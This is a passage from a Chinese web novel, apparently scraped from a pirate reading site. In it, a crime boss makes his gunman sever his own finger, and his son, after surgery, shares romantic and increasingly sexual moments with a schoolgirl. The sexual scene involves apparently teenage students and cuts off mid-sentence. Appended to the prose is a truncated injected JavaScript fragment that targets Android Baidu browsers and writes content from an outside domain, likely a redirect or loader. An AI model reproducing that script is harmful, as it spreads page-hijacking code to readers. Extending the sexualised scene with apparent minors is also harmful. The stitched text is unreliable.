逃脱 分卷阅读81

    会为了救那个女人……”

    “你这是在怪荻吗?”低沉的声音缓慢的响起。

    “属下不敢”杰克跪在地上,“误伤大少爷,我有不可推卸的责任,属下愿自裁”说完,杰克自袖筒里抽出匕首向自己左手小指剁去。

    “慢着”

    杰克停手,眸里闪过一丝希望。

    纳兰司懿沉冷的声音响起来,“获还在抢救当中,生死不明,杀人偿命,念在这些年你忠诚效力的份上,留你一条命,不过你已经不配再做杀手,自己截去右手食指,从此以后不要再在这个道上混”

    “总裁……”杰克知道再分辨已是无用,这些年已领略过总裁的决断杀伐冷酷无情,他持起匕首,向右手食指削去,血涌如柱而他却未发出半点声音,拾起断掉的食指,杰克扬长而去。

    杰克是他的左膀右臂追随他多年,枪法神奇,冷血无情,对他却忠诚如一。而今他的得力助手却都葬送在他的儿子手中。

    荻,他居然会为一个女人这样轻视自己的性命……

    “哗……”他一挥手,书桌上的东西都应声落地,名贵的花瓶和烟灰缸在地板上四分五裂。

    Sammy跪在地板上,一点点捡拾着玻璃残片,她轻轻抬头,目光落在纳兰司懿的背影上,那个背影挺拔高大,充满高高在上的贵族气质,然而他也是孤独的,高处不胜寒……

    她真的好想走过去抱住他的腰,告诉他如果有爱就不要埋在心里……

    蓝山学校暂停了所有课程,所有老师和同学都等待学校通知。蓝静仪和纳兰葎一直坐在走廊里,互相支撑,等待着手术的结果。

    48小时后,手术室的门终于打开了,医生告诉他们手术很成功。

    手术后纳兰荻一直昏迷了三天,纳兰葎和蓝静仪片刻守候在他床边。第四天,纳兰荻张开眼睛的时候,第一眼就看到蓝静仪的脸。

    他的黑发凌乱,瞳眸却依旧黑沉不羁。他向她轻笑,蓝静仪怔住了,眼泪不由自主的喷涌而出。

    “哭什么,傻瓜……”他声音虚弱而沙哑。

    “哥”纳兰葎跳起来抓住他,“哥你可醒了”纳兰葎俊美的面颊清瘦了不少,一向整齐的长发乱如海藻。

    “臭小子,一定哭鼻子了”纳兰荻调侃他。

    “谁哭了,我才没有”纳兰葎死都不承认。

    “还不承认,小时候你就很爱哭”

    “纳兰荻,闭嘴呀”纳兰葎恼怒地叫道,他看了看一旁的蓝静仪,不满意同胞哥哥在她面前揭他的短。

    “他是哭过了,哭的比我还厉害”蓝静仪静静地说。

    “你……居然为讨好哥出卖我”纳兰葎窜过去抓住蓝静仪。蓝静仪惊叫一声连忙躲开。两个人就这样又叫又跳地追打,岑寂的病房立刻传来笑闹声。

    纳兰荻咳嗽着,“不许欺负她,葎”

    “听没听到,我哥他是不是很奇怪,这是不是我哥啊”纳兰葎抓住蓝静仪,作式地掐着她的脖子,却没有用力。

    蓝静仪扭头看着纳兰荻,纳兰荻黑眸也正静静地看着她。

    “你们做什么”纳兰葎挡在他们面前,“当我是透明人啊”

    “我饿了,葎去给我买饭”纳兰葎说道。

    “医生说醒来说只可以先喝点水,打葡萄糖,不可以吃别的”纳兰葎不满地搬出医生来。

    “医生都是在放屁,快点去!”

    纳兰葎不甘心地嘟嘟哝哝地走出去。

    “医生是这样说的……”

    “不要说话……”纳兰荻伸出手,修长干净的手指轻抚过她的面颊,温柔,细致像轻风微拂。

    她的面颊痒痒的,微凉的指肚摩挲她的皮肤,有种异常的柔情在里面,舒服的又让她的心砰砰急跳。

    “你也瘦了……”他抓过她的手,亲吻她的手指,一根一根,他的唇却是热烈而滚烫的,蓝静仪的一滴泪啪地落在他的手背上。

    他皱了一下眉,脸依旧还是那么好看,“怎么又哭了?”

    “谢谢你没有死……”蓝静仪抽噎着说。

    第49章

    “你这个小傻瓜”他轻叹,炙热的唇长久地停留在她的手心,她屏着息,不敢动,怕破坏掉这暂时的温柔。

    “答应我一个条件好吗?”纳兰荻闭着眼,唇仍旧不曾离开她的掌心。

    “嗯?”霸道冷酷的纳兰荻也会和她谈条件吗?

    “你会答应吗?”他抬起头,黑眸沉沉地看着她。

    她的心动了动,不由自己的点头,“会的”

    “答应了就一定要做到”他挑眉说,“以后不要和蓝蕼再有任何交往,可以吗?”

    她有点愣怔,没想到纳兰荻会提出这样的条件,他不是以他一贯的命令和威喝,他应该知道如果那样她基于对他的恐惧和对蓝蕼安全的顾虑她也会照着做,可是他却用商量和一种平静的口吻请求她,这不得不让她更加为难。

    她怎么能不答应他呢,怎么忍心不答应他呢,他刚刚因为救她的命而刚从鬼门关里被拉回来。

    “我答应你,以后除了老师和同学的关系,尽量不和蓝蕼有任何交往”她轻轻说。

    纳兰荻脸上呈现出淡淡的微笑,似乎对她的表现很满意。

    “我知道你会说到做到”他的唇又一次吻上她的指尖。

    蓝静仪手指轻颤着,她几乎有点不习惯平日狂野的少年所表现出的这种极至温柔。

    纳兰荻慵懒地卧在床上,颀长的身体裹着一身白色的睡衣,上衣的带子并未系牢,露出赤裸结实的胸膛和白色的绷带。

    蓝静仪垂着头,双手替他拆解绷带,这几天都是她在替他上药。

    她纤白的手指轻巧灵活,在绷带上轻轻飞舞,偶尔会触碰到他的肌肤。她呼吸格外轻,仿佛害怕呼吸重些就会妨碍到他的伤口。

    少年起初很配合地任她替他拆着绷带,黑眸一直停在她肃静的小脸儿上,她的脸上有一种非常专注的神情,她似乎做任何事都很用心,因为这种表情常在她身上看到,莫名奇妙地就把人带进一种非常沉静的境界。

    她淡淡的唇紧抿着,像春天落蕊般的颜色,淡粉中带着一丝苍白,有一种楚楚的风情。

    他的眼睛在她的身上流连,手开始不老实,慢慢抚上她的颊,插进柔长的黑发中,纠缠。

    抚上她的眉眼,指间的触感美妙而诱人。

    “别闹”她轻声阻止。而柔柔的声音却反而触动少年心底的欲望。

    他抓住她忙碌的小手按在他的胸前,让她的小手游移在他赤裸的胸膛上。

    蓝静仪吓了一跳,手指触到那滚烫赤裸的肌肤,少年狭长浓烈的瞳眸紧紧地注视她,呼吸粗重,胸膛起伏。

    “别……不要……你身上的伤……”她轻呼,手掌仍印在他燥热的肌肤上。她看到少年的身体已经起了反应,胯

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('